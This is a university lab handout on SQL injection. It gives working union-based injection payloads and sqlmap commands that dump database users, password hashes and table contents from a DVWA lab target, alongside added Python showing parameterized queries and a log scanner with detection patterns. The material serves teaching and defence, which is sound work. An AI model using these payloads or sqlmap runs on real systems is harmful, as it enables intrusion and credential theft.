Chapter 9 - LAB - Database Security

The document discusses SQL injection attacks and how to use sqlmap to exploit vulnerabilities. It provides examples of using sqlmap against the Damn Vulnerable Web Application (DVWA) to obtain information like database usernames and passwords, database names, table names, and user data like usernames and passwords from tables. The document instructs on downloading DVWA and sqlmap and running commands with sqlmap to retrieve various pieces of sensitive information from the target database and server.


4/2/2018

Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE

• SQL Injection attacks
  o Example
• Damn Vulnerable Web App (DVWA)
  o Examples
• sqlmap
  o Examples

4/1/2018 2


• SQL injection can do more harm than just bypassing the login logic. Some of the attacks include:
  o Deleting data
  o Updating data
  o Inserting data
  o Executing commands on the server that can download and install malicious programs such as Trojans
  o Exporting valuable data such as credit card details, email addresses and passwords to the attacker's remote server
  o Getting user login details, etc.


• Crack username/password
  o SQL query:
    SELECT * FROM Users WHERE Username='$username' AND Password='$password'
  o Type:
    $username = 1' or '1' = '1
    $password = 1' or '1' = '1
  o The query becomes:
    SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'
  => The condition is always true (OR 1=1), so the system authenticates the user without knowing a valid username and password.


• SQL query:
    SELECT * FROM products WHERE id_product=$id_product
  Ex: http://www.example.com/product.php?id=10
• Using the operators AND and OR:
    SELECT * FROM products WHERE id_product=10 AND 1=2
  Ex: http://www.example.com/product.php?id=10 AND 1=2
  => there is no content available, or a blank page.
• Then send a true statement and check whether a valid result comes back:
  Ex: http://www.example.com/product.php?id=10 AND 1=1
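The two defects on the last two slides (the login query built by string concatenation, and the product id pasted straight into the statement) next to the parameterized form that removes them, as an added example in Python with sqlite3; it is not part of the original slides, the Users/products rows are constructed, and passwords are compared in plaintext only to mirror the slide's query.

```python
import sqlite3

# Constructed in-memory tables standing in for the Users and products tables the slides query.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('alice', 's3cret')")
    conn.execute("CREATE TABLE products (id_product INTEGER, name TEXT)")
    conn.execute("INSERT INTO products VALUES (10, 'widget')")
    return conn

def login_vulnerable(conn, username, password):
    # Same construction as the slide: the input becomes part of the SQL text,
    # so a quote in it ends the literal and the rest is parsed as SQL.
    sql = ("SELECT * FROM Users WHERE Username='" + username +
           "' AND Password='" + password + "'")
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, username, password):
    # Placeholders: the driver binds the values separately, so quotes are plain data.
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return conn.execute(sql, (username, password)).fetchone() is not None

def product_vulnerable(conn, id_product):
    # The id is pasted into the statement, so "10 AND 1=2" rewrites the WHERE clause.
    sql = "SELECT name FROM products WHERE id_product=" + id_product
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def product_safe(conn, id_product):
    # Reject anything that is not a plain integer before it reaches the database, then bind it.
    try:
        id_int = int(id_product)
    except ValueError:
        return None
    row = conn.execute("SELECT name FROM products WHERE id_product=?", (id_int,)).fetchone()
    return row[0] if row else None

PAYLOAD = "1' or '1' = '1"  # the always-true input from the slide

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, PAYLOAD, PAYLOAD))  # True: logged in with no valid credentials
    print(login_safe(db, PAYLOAD, PAYLOAD))        # False: the payload is just a strange username
    print(product_vulnerable(db, "10 AND 1=2"))    # None: the "blank page" of the boolean probe
    print(product_vulnerable(db, "10 AND 1=1"))    # widget
    print(product_safe(db, "10 AND 1=2"))          # None: rejected before any query runs
```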


• Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test
  1.1 Download DVWA
  1.2 Create database and user in DVWA
  1.3 Config DVWA
  1.4 Setup basic database in DVWA
  1.5 Access DVWA: http://10.0.0.2/login.php
• Set DVWA Security Level: Low


• Basic injection: 1
• Always-true scenario: %' or '0'='0
• Display database version:
  o %' or 0=0 union select null, version() #
• Display database user:
  o %' or 0=0 union select null, user() #
• Display database name:
  o %' or 0=0 union select null, database() #
• Display all tables in information_schema:
  o %' and 1=0 union select null, table_name from information_schema.tables #


• Display all the user tables in information_schema:
  o %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' #
• Display all the column fields of the users table, read from information_schema:
  o %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
• Display the contents of all column fields in the users table:
  o %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #


• sqlmap is an open source penetration testing tool that automates the process of
  o detecting and exploiting SQL injection flaws
  o taking over database servers.
• It comes with a kick-ass detection engine
• Many niche features
  o for the ultimate penetration tester
  o a broad range of switches ranging from database fingerprinting,
  o over data fetching from the database,
  o to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
• Download and install sqlmap:
  http://sqlmap.sourceforge.net/doc/README.html#s1

• Open Firefox and add the Tamper Data add-on to the Tools menu
• Select Tools\Tamper Data
• Start Tamper Data


• Run the SQL injection
• Tamper with the request:
  o Copy the Referer URL (Ref)
    Ex: http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
  o Copy the cookie information (Coo)
    Ex: PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low
• Run sqlmap to obtain the following pieces of information
  o Obtain the database user for DVWA. Syntax:
    ./sqlmap.py -u <Ref> --cookie <Coo> -b --current-db --current-user
  o Ex: ./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
    Do you want to keep testing? Y => Result

• Run sqlmap
  o Obtain database management usernames and passwords. Syntax:
    ./sqlmap.py -u <Ref> --cookie <Coo> --string="Surname" --users --passwords
    Use dictionary attack? Y
    Dictionary location? <Press Enter>
  o Obtain db_hacker database privileges. Syntax:
    ./sqlmap.py -u <Ref> --cookie <Coo> -U db_hacker --privileges
  o Obtain a list of all databases:
    ./sqlmap.py -u <Ref> --cookie <Coo> --dbs
  o Obtain "dvwa" tables and contents:
    ./sqlmap.py -u <Ref> --cookie <Coo> -D dvwa --tables
  o Obtain columns for table dvwa.users:
    ./sqlmap.py -u <Ref> --cookie <Coo> -D dvwa -T users --columns


• Run sqlmap
  o Obtain users and their passwords from table dvwa.users. Syntax:
    ./sqlmap.py -u <Ref> --cookie <Coo> -D dvwa -T users -C user,password --dump
    Do you want to use the LIKE operator? Y
    Recognize possible hash values? Y
    What's the dictionary location? <Press Enter>
    Use common password suffixes? Y
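On the defensive side, the union and always-true payloads from the DVWA slides and the sqlmap runs just described leave recognisable traces in web-server logs. The following added example (not part of the original lab) scans constructed Apache-style access log lines for those payloads after URL-decoding the query string and flags sqlmap's default User-Agent; the addresses, timestamps, sizes and the exact User-Agent version string are made up.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (addresses, times and sizes are made up): a normal
# DVWA request, the union payload and the always-true payload from the slides, and a request
# carrying sqlmap's default User-Agent.
SAMPLE_LOG = """\
10.0.0.5 - - [02/Apr/2018:10:01:02 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4212 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Apr/2018:10:02:15 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+0%3D0+union+select+null%2C+version%28%29+%23&Submit=Submit HTTP/1.1" 200 4388 "-" "Mozilla/5.0"
10.0.0.5 - - [02/Apr/2018:10:03:40 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+%270%27%3D%270&Submit=Submit HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.7 - - [02/Apr/2018:10:05:01 +0700] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4212 "-" "sqlmap/1.2#stable (http://sqlmap.org)"
"""

# Combined log format: client, identity, user, timestamp, request line, status, size, referer, agent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d+) \S+ "[^"]*" "(?P<ua>[^"]*)"')

# Signatures derived from the payloads used in this lab, applied to the URL-decoded query string.
QUERY_SIGNATURES = {
    "union_select": re.compile(r"union\s+select", re.I),
    "information_schema": re.compile(r"information_schema", re.I),
    "always_true": re.compile(r"\bor\s+'?(\w+)'?\s*=\s*'?\1'?", re.I),   # or 1=1, or '0'='0
    "db_function": re.compile(r"\b(version|user|database)\s*\(\s*\)", re.I),
}
SQLMAP_AGENT = re.compile(r"^sqlmap/", re.I)   # sqlmap's default User-Agent prefix

def scan_line(line):
    """Return {"ip", "hits", "decoded"} for a parseable line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("path"))   # one decoding pass, as the web server sees it
    hits = [name for name, rx in QUERY_SIGNATURES.items() if rx.search(decoded)]
    if SQLMAP_AGENT.search(m.group("ua")):
        hits.append("sqlmap_agent")
    return {"ip": m.group("ip"), "hits": hits, "decoded": decoded}

def scan_log(text):
    """Return the scan results for every line that triggered at least one signature."""
    results = (scan_line(line) for line in text.splitlines())
    return [r for r in results if r and r["hits"]]

if __name__ == "__main__":
    for r in scan_log(SAMPLE_LOG):
        print(r["ip"], r["hits"], r["decoded"])
```

Only one URL-decoding pass is applied, so a double-encoded query would need a second pass before matching. The User-Agent rule only catches sqlmap left at its default, since the --random-agent option replaces that header.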


• Use sqlmap to obtain the following pieces of information:
  o A list of database management usernames and passwords
  o A list of databases
  o A list of tables for a specified database
  o A list of users and passwords for a specified database table
